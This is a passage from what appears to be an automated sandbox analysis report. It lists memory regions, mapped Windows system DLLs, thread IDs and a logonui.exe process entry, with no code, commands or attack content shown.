"\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37434 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37435 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = 
private name = "private_0x0000000000230000" filename = "" Region: id = 37436 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37437 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37438 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37439 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37440 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37441 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37442 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37443 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37450 start_va = 0x75060000 end_va = 0x75084fff entry_point = 0x75060000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37451 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37452 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: 
"c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37453 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37454 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37698 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 37699 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 37700 start_va = 0x75700000 end_va = 0x7573bfff entry_point = 0x75700000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 37701 start_va = 0x75230000 end_va = 0x75234fff entry_point = 0x75230000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 37705 start_va = 0x756f0000 end_va = 0x756f5fff entry_point = 0x756f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 37762 start_va = 0x752e0000 end_va = 0x752f5fff entry_point = 0x752e0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 37802 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename 
= "" Region: id = 37803 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37804 start_va = 0x742a0000 end_va = 0x742c4fff entry_point = 0x742a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37805 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37806 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37807 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37808 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37814 start_va = 0x1020000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 37815 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 37816 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37817 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37818 start_va = 0x11a0000 end_va = 0x11dffff entry_point = 0x0 region_type = 
private name = "private_0x00000000011a0000" filename = "" Region: id = 37819 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 37820 start_va = 0x1160000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 37821 start_va = 0x75060000 end_va = 0x75080fff entry_point = 0x75060000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 37822 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 37823 start_va = 0x77730000 end_va = 0x77774fff entry_point = 0x77730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 37827 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37828 start_va = 0x230000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 37829 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 37830 start_va = 0x8f0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 37831 start_va = 0x910000 end_va = 0x943fff entry_point = 0x910000 region_type = mapped_file name = "fltmgr.sys" filename = "\\Windows\\System32\\drivers\\fltMgr.sys" (normalized: "c:\\windows\\system32\\drivers\\fltmgr.sys") Region: id = 37834 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 37835 start_va = 0xa50000 end_va = 0xa8ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 37836 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 37837 start_va = 0x40960000 end_va = 0x40970fff entry_point = 0x40960000 region_type = mapped_file name = "pshed.dll" filename = "\\Windows\\System32\\PSHED.DLL" (normalized: "c:\\windows\\system32\\pshed.dll") Region: id = 37840 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 37841 start_va = 0x910000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 37864 start_va = 0x74160000 end_va = 0x74206fff entry_point = 0x74160000 region_type = mapped_file name = "adtschema.dll" filename = "\\Windows\\System32\\adtschema.dll" (normalized: "c:\\windows\\system32\\adtschema.dll") Region: id = 37865 start_va = 0x11e0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 37911 start_va = 0x74200000 end_va = 0x7420dfff entry_point = 0x74200000 region_type = mapped_file name = "microsoft-windows-kernel-power-events.dll" filename = "\\Windows\\System32\\microsoft-windows-kernel-power-events.dll" (normalized: "c:\\windows\\system32\\microsoft-windows-kernel-power-events.dll") Region: id = 37912 start_va = 0x74200000 end_va = 0x74206fff entry_point = 0x74200000 region_type = mapped_file name = "microsoft-windows-kernel-processor-power-events.dll" filename = "\\Windows\\System32\\microsoft-windows-kernel-processor-power-events.dll" (normalized: "c:\\windows\\system32\\microsoft-windows-kernel-processor-power-events.dll") Region: id = 37913 start_va = 0x990000 end_va = 0x9d0fff entry_point = 0x990000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" 
(normalized: "c:\\windows\\system32\\services.exe") Region: id = 37914 start_va = 0x75340000 end_va = 0x75388fff entry_point = 0x75340000 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 37932 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 37933 start_va = 0x74250000 end_va = 0x742c9fff entry_point = 0x74250000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 37934 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37935 start_va = 0x74220000 end_va = 0x74244fff entry_point = 0x74220000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 37936 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37937 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37938 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37939 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37940 
start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 37941 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 37942 start_va = 0x74210000 end_va = 0x74216fff entry_point = 0x74210000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 37943 start_va = 0x12e0000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 37944 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 37945 start_va = 0xfb0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 37946 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 37947 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 37948 start_va = 0x930000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 37995 start_va = 0x14a0000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 37996 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37997 start_va = 0x940000 end_va 
= 0x940fff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 37998 start_va = 0x9e0000 end_va = 0x9e0fff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 38001 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 38002 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 38005 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 38006 start_va = 0x1420000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 38007 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 38395 start_va = 0x74090000 end_va = 0x74122fff entry_point = 0x74090000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 38404 start_va = 0x74050000 end_va = 0x7407afff entry_point = 0x74050000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 38405 start_va = 0x74160000 end_va = 0x741e7fff entry_point = 0x74160000 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 38435 start_va = 0x72a10000 end_va = 0x72b4dfff entry_point = 0x72a10000 region_type = mapped_file name = "comres.dll" filename = "\\Windows\\System32\\comres.dll" (normalized: "c:\\windows\\system32\\comres.dll") Region: id = 38555 start_va = 0xfb0000 end_va = 0xff3fff entry_point = 0xfb0000 
region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 38556 start_va = 0x1010000 end_va = 0x1057fff entry_point = 0x1010000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 38557 start_va = 0x14e0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 38558 start_va = 0xfb0000 end_va = 0xff7fff entry_point = 0xfb0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 38797 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 38847 start_va = 0x1800000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 38848 start_va = 0x711e0000 end_va = 0x711e7fff entry_point = 0x711e0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 38849 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 38850 start_va = 0x72b60000 end_va = 0x72b7bfff entry_point = 0x72b60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 38851 start_va = 0x72b50000 end_va = 0x72b56fff entry_point = 0x72b50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 38852 start_va = 0x711d0000 end_va 
= 0x711d5fff entry_point = 0x711d0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Thread: id = 1112 os_tid = 0x2b4 Thread: id = 1114 os_tid = 0x2c0 Thread: id = 1117 os_tid = 0x2c8 Thread: id = 1118 os_tid = 0x2d0 Thread: id = 1119 os_tid = 0x2d4 Thread: id = 1124 os_tid = 0x2e8 Thread: id = 1125 os_tid = 0x2ec Thread: id = 1143 os_tid = 0x33c Thread: id = 1144 os_tid = 0x340 Thread: id = 1145 os_tid = 0x344 Thread: id = 1146 os_tid = 0x348 Thread: id = 1148 os_tid = 0x350 Thread: id = 1162 os_tid = 0x38c Thread: id = 1163 os_tid = 0x390 Thread: id = 1164 os_tid = 0x394 Thread: id = 1167 os_tid = 0x3a4 Thread: id = 1169 os_tid = 0x3ac Thread: id = 1229 os_tid = 0x4b0 Process: id = "673" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x7f1d1180" os_pid = "0x2fc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "666" os_parent_pid = "0x184" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 37467 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37468 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 37469 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 37470 start_va = 0x840000 end_va = 0x845fff entry_point = 0x840000 region_type = mapped_file name = "logonui.exe" filename = "\\Windows\\System32\\LogonUI.exe" (normalized: "c:\\windows\\system32\\logonui.exe") Region: id = 37471 start_va = 0x77b00000 end_va = 0x77c3bfff 
entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37472 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37473 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37474 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37475 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37477 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 37478 start_va = 0xb0000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 37479 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37480 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37481 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37482 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37483 start_va = 0xb0000 
end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37484 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 37485 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37486 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37487 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37488 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37489 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37490 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37491 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37492 start_va = 0x390000 end_va = 0x51ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000000390000" filename = "" Region: id = 37493 start_va = 0x50000 end_va = 0x6cfff entry_point = 0x50000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37494 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 37495 start_va = 0x50000 end_va = 0x6cfff entry_point = 0x50000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37496 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37497 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37498 start_va = 0x50000 end_va = 0x6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 37499 start_va = 0x390000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 37500 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 37501 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37502 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 37503 start_va = 0x200000 end_va = 0x25bfff entry_point = 0x200000 region_type = mapped_file name = "rpcss.dll" filename = 
"\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37504 start_va = 0x200000 end_va = 0x25bfff entry_point = 0x200000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37505 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37506 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 37507 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 37508 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37509 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37510 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37511 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 37512 start_va = 0x74ea0000 end_va = 0x75056fff entry_point = 0x74ea0000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: 
"c:\\windows\\system32\\authui.dll") Region: id = 37515 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 37516 start_va = 0x74da0000 end_va = 0x74e97fff entry_point = 0x74da0000 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 37518 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 37519 start_va = 0x75d90000 end_va = 0x75eacfff entry_point = 0x75d90000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 37520 start_va = 0x75cc0000 end_va = 0x75ccbfff entry_point = 0x75cc0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 37521 start_va = 0x74c00000 end_va = 0x74d9dfff entry_point = 0x74c00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 37522 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 37523 start_va = 0x240000 end_va = 0x240fff entry_point = 0x240000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 37526 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 
